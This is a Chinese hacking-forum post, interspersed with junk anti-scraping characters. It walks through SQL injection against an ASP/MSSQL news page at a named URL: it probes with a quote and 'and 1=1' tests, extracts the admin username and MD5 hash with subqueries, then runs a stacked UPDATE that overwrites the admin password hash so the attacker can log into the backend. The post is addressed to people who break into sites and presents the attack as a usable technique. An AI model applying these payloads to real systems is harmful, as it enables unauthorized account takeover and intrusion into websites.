经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。% V2 H. D6 |0 X( ?1 v7 x+ w" f
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)6 [$ H( h8 p7 l' _+ X$ ]
测试如下:
4 B( I, A. V. h" D+ F' a. Thttp://www.tmdsb.com/news.asp?id=121( V1 N; @7 N) N G" [& w
在地址后输入单引号,显示) D2 k9 M' {3 n, N g* B
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
$ }+ J" C' h3 B* X$ G5 z- e" V1 y字符串 ’’’ 之前有未闭合的引号+ P: M2 u6 O g3 F
/news/tmdws.asp,行63
& P* c1 j0 q2 A* \2 m5 u5 S说明没有过滤单引号且数据库是MSSQL.
/ O4 ^$ X, {( h5 Z* Wand 1=1正常。and 1=2出错。肯定存在注入, H: F' F6 a* q
接着输入
/ H4 c* F8 ^8 Z. B A1 P+ c0 _http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)' z5 |" m8 Z3 j
得到帐号为:admin8 A$ q6 c! `: G R0 L9 S. q9 m3 o
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)" B& _* ?% z3 j8 S* C3 _
得到密码为:a4716077c2ba075c
1 q* E; s* G& w# L ~) \0 N接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
9 V. t+ B3 V1 W: ^* {8 c命令如下 :# g$ T, E. W* P' [$ c7 r& ~: @$ z
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
$ b$ s7 G/ B8 O这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41